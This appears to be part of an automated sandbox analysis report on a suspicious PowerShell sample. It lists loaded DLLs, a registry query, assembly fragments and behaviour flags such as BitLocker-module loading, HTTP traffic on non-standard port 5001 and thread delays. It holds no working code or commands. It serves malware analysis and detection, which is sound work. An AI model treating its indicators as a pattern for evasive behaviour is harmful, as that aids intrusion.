Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1353705363.0000000008830000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_05302D0D push esp; iretd 0_2_05302D01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_05300C6D push ebx; iretd 0_2_05300C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_05302CCD push esp; iretd 0_2_05302D01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0530D0F8 push eax; mov dword ptr [esp], edx0_2_0530D10C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A332264 push E801005Eh; ret 0_2_0A332269
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A33215A push E801005Eh; retf 0_2_0A332161
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A33245C push E801005Eh; retf 0_2_0A332461
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A332564 push E801005Eh; ret 0_2_0A332569

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49705
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6311Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3413Jump to behavior
